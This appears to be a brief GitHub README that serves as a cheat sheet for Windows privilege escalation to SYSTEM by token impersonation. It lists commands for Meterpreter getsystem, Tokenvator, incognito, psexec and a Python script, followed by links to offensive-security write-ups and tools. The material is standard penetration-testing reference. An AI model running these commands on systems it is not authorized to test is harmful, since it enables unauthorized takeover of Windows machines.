nighter233 / tokenx_privEsc

tokenx_privEsc

with metasploit
meterpreter> getsystem

without metasploit
C:\temp> Tokenvator.exe getsystem cmd.exe

C:\temp> incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

C:\temp> psexec -s -i cmd.exe

C:\temp> python getsystem.py

more about tokens privilege

Resources:

https://blog.xpnsec.com/becoming-system/
https://github.com/hatRiot/token-priv
https://powersploit.readthedocs.io/en/latest/Privesc/Get-System/
https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/
https://hunter2.gitbook.io/darthsidious/privilege-escalation/token-impersonation
https://heynowyouseeme.blogspot.com/2019/08/the-useage-of-9-permissions-for-windows.html
https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation
https://github.com/sailay1996/NP_impersonate
https://github.com/Cn33liz/EasySystem
https://labs.mwrinfosecurity.com/blog/incognito-v2-0-released/
https://decoder.cloud/2019/03/06/windows-named-pipes-impersonation/
https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html
https://0x00-0x00.github.io/research/2018/10/21/Windows-API-And-Impersonation-Part-2.html
https://pentestlab.blog/tag/token-impersonation/
https://github.com/0xbadjuju/Tokenvator/
https://decoder.cloud/2019/07/04/creating-windows-access-tokens/
https://github.com/decoder-it/whoami-priv
https://decoder.cloud/2018/02/02/getting-system/
https://gist.githubusercontent.com/realoriginal/19c2c9c3b14ec65c203dd796ad44e5c5/raw/b4900e95506d8dc4d3b415ad9b27c6cc73544d94/np_impersonate.c